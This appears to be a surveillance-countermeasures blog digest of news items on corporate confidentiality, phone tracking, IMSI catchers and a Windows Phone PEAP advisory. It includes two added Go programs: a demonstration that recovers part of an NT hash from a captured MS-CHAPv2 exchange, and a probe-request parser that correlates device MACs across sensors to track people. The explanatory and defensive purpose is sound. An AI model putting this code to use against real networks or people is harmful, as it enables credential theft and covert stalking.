An abridged overview by Jim Lindell, President, Thorsten Consulting Group Inc.... First, the company must establish values and principles that define appropriate behavior regarding confidential information such as personnel, technologies, customers and suppliers. Once values and policies have been established, management must support, review and enforce them.
Second, make sure the hiring process emphasizes how employees must handle confidential information. Determine the candidate's ability to maintain confidentiality. How? By asking tough questions during the interview and doing thorough background checks.
After the employee is hired, continue training and explaining your policies and procedures regarding confidential information. The role of the CEO and senior management can't be overstated.
The CEO, on a regular basis, should highlight unacceptable public behavior and emphasize that it won't be tolerated. The Snowden/Manning incidents provide excellent examples that illustrate confidentiality expectations for all employees. At a minimum, these messages must come from the CEO at least once a year.
The best policies and procedures

To be effective, policies and procedures must:
• Reinforce acceptable behavior.
• Create a monitoring process to detect breaches in confidential information. (An integral part of a TSCM bug sweep.)
• Create an audit process to determine whether existing rules are being followed. (An integral part of a TSCM bug sweep.)

You must assess the nature of confidential information that is maintained and the potential for abuse. Both Snowden and Manning required technological tools and technological skills. You must understand the devices your employees are using, and how they can use them to access confidential information...
In addition to electronic access to your systems, you also must be aware of people who have physical access. The ability to take pictures of processes, documents and employees has changed dramatically. You must restrict access to your plant and offices.
Finally, it's important to establish policies and procedures that address disposal of equipment like computers, tablets, hard disk drives and flash drives. Since we can't see the digital information, it's easy to discard hardware and not realize what we're actually tossing out.
All businesses are at risk. Some are just more prepared than others. (more)
Smartphones should soon be able to charge themselves using transparent Wysips Crystal photovoltaic panels bonded into their screens. And if the idea takes off, tablets and eventually whole buildings could follow... (more) (more including photovoltaic clothing)
Imagine... The bug hidden in the picture frame would never have to have its battery replaced.
Tech-savvy criminals try to evade being tracked by changing their cellphone's built-in ID code and by regularly dumping SIM cards. But engineers in Germany have discovered that the radio signal from every cellphone handset hides within it an unalterable digital fingerprint — potentially giving law enforcers a simple way of tracking the handset itself.
Developed by Jakob Hasse and colleagues at the Technical University of Dresden, the tracking method exploits the tiny manufacturing variations in the electronic components inside a phone.
When the handset converts analogue signals into digital ones, the stream of data it broadcasts to the local mast carries error patterns that are unique to that phone's particular mix of components. In lab tests on 13 handsets, the Dresden team identified the source handset with an accuracy of 97.6 percent. (more)
Smartphones running Microsoft's Windows Phone operating system are vulnerable to attacks that can extract the user credentials needed to log in to sensitive corporate networks, the company warned Monday...
"An attacker-controlled system could pose as a known Wi-Fi access point, causing the victim's device to automatically attempt to authenticate with the access point and in turn allowing the attacker to intercept the victim's encrypted domain credentials," the Microsoft advisory warned. "An attacker could then exploit cryptographic weaknesses in the PEAP-MS-CHAPv2 protocol to obtain the victim's domain credentials." (more)
Require server-certificate validation in your WPA2-Enterprise (PEAP) profile before connecting, so the phone refuses to authenticate to any access point that cannot present a certificate from your own trusted CA. Now.
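The "cryptographic weakness" the advisory alludes to lies in how MS-CHAPv2 builds its response: the 16-byte NT hash of the password is padded with five zero bytes to 21 bytes and cut into three 7-byte DES keys, so the third key carries only 16 secret bits and the whole hash falls to a single 2^56 DES search. The Go program below is an added illustration, not code from Microsoft or from the advisory. It computes the response exactly as a client does (RFC 2759) and then, playing the rogue access point that already holds the challenge and the response, recovers the last two bytes of the NT hash from that one exchange. The NT hash, the challenges and the user name are constructed sample values.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"fmt"
)

// SampleNTHash is a constructed 16-byte NT hash standing in for the victim's
// password hash (it is MD4 of the UTF-16LE string "password"; any 16 bytes
// would serve the demonstration equally well).
var SampleNTHash = [16]byte{
	0x88, 0x46, 0xf7, 0xea, 0xee, 0x8f, 0xb1, 0x17,
	0xad, 0x06, 0xbd, 0xd8, 0x30, 0xb7, 0x58, 0x6c,
}

// ChallengeHash derives the 8-byte DES plaintext used by MS-CHAPv2: the first
// eight bytes of SHA1(PeerChallenge || AuthenticatorChallenge || UserName).
func ChallengeHash(peer, auth [16]byte, user string) [8]byte {
	h := sha1.New()
	h.Write(peer[:])
	h.Write(auth[:])
	h.Write([]byte(user))
	var out [8]byte
	copy(out[:], h.Sum(nil)[:8])
	return out
}

// desKey spreads 7 key bytes over 8 bytes with one (ignored) parity bit per
// byte, the layout crypto/des expects. The key still has exactly 56 secret bits.
func desKey(k7 []byte) []byte {
	k8 := []byte{
		k7[0] >> 1,
		(k7[0]&0x01)<<6 | k7[1]>>2,
		(k7[1]&0x03)<<5 | k7[2]>>3,
		(k7[2]&0x07)<<4 | k7[3]>>4,
		(k7[3]&0x0F)<<3 | k7[4]>>5,
		(k7[4]&0x1F)<<2 | k7[5]>>6,
		(k7[5]&0x3F)<<1 | k7[6]>>7,
		k7[6] & 0x7F,
	}
	for i := range k8 {
		k8[i] <<= 1 // parity bit goes in the low bit of each byte
	}
	return k8
}

// NTResponse is what the client sends back: the challenge encrypted three times
// under keys cut from the NT hash padded to 21 bytes with zeros. Bytes 16..20 of
// the padded hash are those zeros, so the third key holds only two secret bytes.
func NTResponse(ntHash [16]byte, challenge [8]byte) [24]byte {
	var padded [21]byte
	copy(padded[:], ntHash[:])
	var resp [24]byte
	for i := 0; i < 3; i++ {
		c, err := des.NewCipher(desKey(padded[7*i : 7*i+7]))
		if err != nil {
			panic(err)
		}
		c.Encrypt(resp[8*i:8*i+8], challenge[:])
	}
	return resp
}

// RecoverHashTail is the eavesdropper's step: given the challenge and the
// observed response, try all 65536 values of the third key's two secret bytes.
// On success it returns NT hash bytes 14 and 15.
func RecoverHashTail(challenge [8]byte, resp [24]byte) ([2]byte, bool) {
	var k7 [7]byte // hash[14], hash[15], then the five zero pad bytes
	var out [8]byte
	for guess := 0; guess < 1<<16; guess++ {
		k7[0], k7[1] = byte(guess>>8), byte(guess)
		c, _ := des.NewCipher(desKey(k7[:]))
		c.Encrypt(out[:], challenge[:])
		if bytes.Equal(out[:], resp[16:]) {
			return [2]byte{k7[0], k7[1]}, true
		}
	}
	return [2]byte{}, false
}

func main() {
	// Constructed challenges; a rogue AP chooses AuthenticatorChallenge itself.
	var peer, auth [16]byte
	for i := range peer {
		peer[i], auth[i] = byte(i), byte(0x10+i)
	}
	ch := ChallengeHash(peer, auth, "CORP\\alice")
	resp := NTResponse(SampleNTHash, ch)
	tail, ok := RecoverHashTail(ch, resp)
	fmt.Printf("NT-Response: %x\n", resp)
	fmt.Printf("recovered NT hash bytes 14..15: %x (found=%v)\n", tail, ok)
}
```

The brute force over 65536 keys finishes in well under a second; the remaining 14 bytes of the hash are two more DES keys against the same known plaintext, which is the 2^56 search that dedicated hardware handles in hours, and the NT hash is itself sufficient to authenticate. PEAP wraps this exchange in TLS, which is exactly why certificate validation matters: a client that only talks to a server certificate from its own CA never hands the challenge and response to a rogue access point, while a client that skips validation gives the attacker everything this program needs.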
Brendan O’Connor is a security researcher. How easy would it be, he recently wondered, to monitor the movement of everyone on the street – not by a government intelligence agency, but by a private citizen with a few hundred dollars to spare?
Mr. O’Connor, 27, bought some plastic boxes and stuffed them with a $25, credit-card size Raspberry Pi Model A computer and a few over-the-counter sensors, including Wi-Fi adapters. He connected each of those boxes to a command and control system, and he built a data visualization system to monitor what the sensors picked up: all the wireless traffic emitted by every nearby wireless device, including smartphones.
Each box cost $57. He produced 10 of them, and then he turned them on – to spy on himself. He could pick up the Web sites he browsed when he connected to a public Wi-Fi – say at a cafe – and he scooped up the unique identifier connected to his phone and iPad. Gobs of information traveled over the Internet in the clear, meaning they were entirely unencrypted and simple to scoop up.
Even when he didn’t connect to a Wi-Fi network, his sensors could track his location through Wi-Fi “pings.” His iPhone pinged the iMessage server to check for new messages. When he logged on to an unsecured Wi-Fi, it revealed what operating system he was using on what kind of device, and whether he was using Dropbox or went on a dating site or browsed for shoes on an e-commerce site. One site might leak his e-mail address, another his photo.
“It could be used for anything depending on how creepy you want to be,” he said.
You could spy on your ex-lover, by placing the sensor boxes near the places the person frequents, or your teenage child, or the residents of a particular neighborhood. You could keep tabs on people who gather at a certain house of worship or take part in a protest demonstration in a town square. Their phones and tablets, Mr. O’Connor argued, would surely leak some information about them – and certainly if they then connected to an unsecured Wi-Fi. The boxes are small enough to be tucked under a cafe table or dropped from a hobby drone. They can be scattered around a city and go unnoticed. (more) (Want your own CreepyDOL?) Yet another thing a TSCM survey could uncover for you.
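What the boxes catch when a phone is not even connected are 802.11 probe requests: a device looking for networks broadcasts management frames that carry its hardware MAC address as the sender and, frequently, the name of a network it has joined before. The Go program below is an added example, not O'Connor's CreepyDOL code; it parses probe requests out of raw frame bytes and correlates sightings across sensors the way a network of such boxes would, so that one MAC seen at two sensors becomes one person moving between two places. The frames, MAC addresses, SSIDs and sensor names are all constructed here.

```go
package main

import (
	"encoding/binary"
	"fmt"
	"net"
	"sort"
)

// Sighting records one device seen by one sensor and the SSID it asked for
// (empty for a wildcard probe).
type Sighting struct {
	Sensor string
	SSID   string
}

// ParseProbeRequest pulls the sender MAC and the requested SSID out of a raw
// 802.11 management frame. It returns ok=false for anything that is not a
// well-formed probe request (frame type 0, subtype 4, with an SSID element).
func ParseProbeRequest(frame []byte) (mac, ssid string, ok bool) {
	const hdrLen = 24 // FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2)
	if len(frame) < hdrLen {
		return "", "", false
	}
	fc := frame[0] // bits: version(0-1) type(2-3) subtype(4-7)
	if fc&0x03 != 0 || (fc>>2)&0x03 != 0 || fc>>4 != 4 {
		return "", "", false
	}
	mac = net.HardwareAddr(frame[10:16]).String() // Addr2 is the source address
	// The body is a sequence of tagged parameters: ID(1) Len(1) Value(Len).
	body := frame[hdrLen:]
	for len(body) >= 2 {
		id, n := body[0], int(body[1])
		if len(body) < 2+n {
			return "", "", false // element runs past the end of the frame
		}
		if id == 0 { // SSID parameter set; zero length means wildcard
			return mac, string(body[2 : 2+n]), true
		}
		body = body[2+n:]
	}
	return "", "", false // the SSID element is mandatory in a probe request
}

// Correlate merges the captures of several sensors into one table keyed by
// device MAC. Each slice is sorted so the result does not depend on map order.
func Correlate(captures map[string][][]byte) map[string][]Sighting {
	out := map[string][]Sighting{}
	for sensor, frames := range captures {
		for _, f := range frames {
			mac, ssid, ok := ParseProbeRequest(f)
			if !ok {
				continue
			}
			out[mac] = append(out[mac], Sighting{sensor, ssid})
		}
	}
	for _, s := range out {
		sort.Slice(s, func(i, j int) bool {
			if s[i].Sensor != s[j].Sensor {
				return s[i].Sensor < s[j].Sensor
			}
			return s[i].SSID < s[j].SSID
		})
	}
	return out
}

// buildProbe constructs a sample probe request (test input, not a capture).
func buildProbe(src net.HardwareAddr, ssid string, seq uint16) []byte {
	f := []byte{0x40, 0x00, 0x00, 0x00}               // FC: management/probe request; duration 0
	f = append(f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff) // Addr1: broadcast
	f = append(f, src...)                             // Addr2: the probing device
	f = append(f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff) // Addr3: wildcard BSSID
	var sc [2]byte
	binary.LittleEndian.PutUint16(sc[:], seq<<4) // sequence control, fragment 0
	f = append(f, sc[:]...)
	f = append(f, 0x00, byte(len(ssid))) // SSID element
	f = append(f, ssid...)
	f = append(f, 0x01, 0x04, 0x82, 0x84, 0x8b, 0x96) // Supported rates: 1, 2, 5.5, 11 Mbit/s
	return f
}

func main() {
	phone, _ := net.ParseMAC("a4:c3:61:12:34:56")  // constructed address
	tablet, _ := net.ParseMAC("f0:d1:a9:ab:cd:ef") // constructed address
	captures := map[string][][]byte{
		"cafe-box":   {buildProbe(phone, "HomeWiFi-2G", 1), buildProbe(tablet, "", 7)},
		"office-box": {buildProbe(phone, "HomeWiFi-2G", 2), buildProbe(phone, "", 3)},
	}
	for mac, seen := range Correlate(captures) {
		fmt.Println(mac, seen)
	}
}
```

A real collector would feed frames from a Wi-Fi adapter in monitor mode instead of a constructed list; the parsing and correlation are the same. One caveat that dates the article: starting with iOS 8 (2014) and Android 8 (2017), phones randomize the source MAC in probe requests and send far fewer directed probes naming saved networks, so on current devices the cross-sensor linkage shown here largely breaks down unless the device actually associates with the attacker's network.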
Remember this post from June?
--- The news media is overflowing with reports of "High Tech" car burglars. They appear to be opening locked cars while holding a "black box" which "has police all over the nation stumped as to how it works." Here, at the Spybusters Countermeasures Compound, we believe the black box is nothing more than a radio signal jammer. ---
The spybusters tracked down the tool they probably used to pull off the heists...
The detention by Chinese authorities of a British corporate investigator and his American wife in the wake of a corruption probe into pharmaceutical giant GlaxoSmithKline has had a chilling effect on other risk consultants working in China.
It's unclear why Peter Humphrey and Yu Yingzeng, whose firm ChinaWhys has done work for GSK and other drug makers, were detained. But corporate investigators said they were concerned about the repercussions for the industry.
Multinationals, banks and investors rely on corporate investigators for information about potential partners and investments in China, where a lack of transparency is a hurdle to doing business. Restrictions in the flow of such background information could potentially leave foreign investors exposed to greater risk in the world's second-largest economy. (more)
Canada - Men are forced to use the women’s washroom at Peterborough city hall when council is in closed door meetings. The reason? Fear of people eavesdropping.
Peterborough city council thinks there is more than one kind of leak happening in the men’s bathroom.
City officials are closing down the washroom — which shares a wall with council chambers — for fear that people could eavesdrop on proceedings.
That means men needing the washroom during any closed-door meeting are being asked to use the ladies’ room instead — and a security guard is positioned in the hallway to make sure of that.
City clerk John Kennedy defended the decision to close down the washroom, saying it happens whenever there is a confidential meeting. (more)
In a significant victory for law enforcement, a federal appeals court on Tuesday said that government authorities could extract historical location data directly from telecommunications carriers without a search warrant.
The ruling is the first that squarely addresses the constitutionality of warrantless searches of the historical location data stored by cellphone service providers. (more)
A major Russian newspaper reported that Moscow’s metro system is planning what appears to be a mobile phone tracking device in its metro stations—ostensibly to search for stolen phones.
According to Izvestia (Google Translate), Andrey Mokhov, the operations chief of the Moscow Metro system’s police department, said that the system will have a range of five meters (16 feet). “If the [SIM] card is wanted, the system automatically creates a route of its movement and passes that information to the station attendant,” Mokhov said.
Many outside experts, both in and outside Russia, though, believe that what local authorities are actually deploying is a “stingray,” or “IMSI catcher”—a device that can fool a phone and SIM into reading from a fake mobile phone tower. (IMSI, or an International Mobile Subscriber Identity number, is a 15-digit unique number that sits on every SIM card.) Such devices can be used as a simple way to see what phone numbers are being used in a given area or even to intercept the audio of voice calls. (more)
"According to the Max Planck Institute, you're 100 times more likely to be surveilled by your own government if you live in the Netherlands or you live in Italy," Baker said.
"You're 30 to 50 times more likely to be surveilled if you're a French or a German national than in the United States." (more)
India - Verint's leadership team recently met communications minister Kapil Sibal in Israel and indicated the company's desire to work with the government to intercept all forms of encrypted communications to address India's cyber security needs.
Sibal has also apprised Israel's IT & communications minister Gilad Erdan about engaging Verint to implement an interception solution. "Verint is willing to work with the Indian government to address the issue of intercepting encrypted communications like Gmail, Yahoo mail and others. It will shortly co-ordinate with DoT's security wing and CERT-In teams to implement a customized interception solution," says an internal telecom department note, a copy of which was reviewed by ET. (more)
But wait! There's more!
India - Worried over increasing tiger deaths each year, many due to poaching and poisoning, India plans to start round-the-clock electronic surveillance of some of the tiger habitats using high definition cameras. (more)
A US security expert says he has identified ways to remotely attack high-end surveillance cameras used by industrial plants, prisons, banks and the military, something that could potentially allow hackers to spy on facilities or gain access to sensitive computer networks. Craig Heffner, a former software developer with the National Security Agency (NSA) who now works for a private security firm, said he discovered the previously unreported bugs in digital video surveillance equipment from firms including Cisco, D-Link and TRENDnet... He plans to demonstrate techniques for exploiting these bugs at the Black Hat hacking conference, which starts on July 31 in Las Vegas.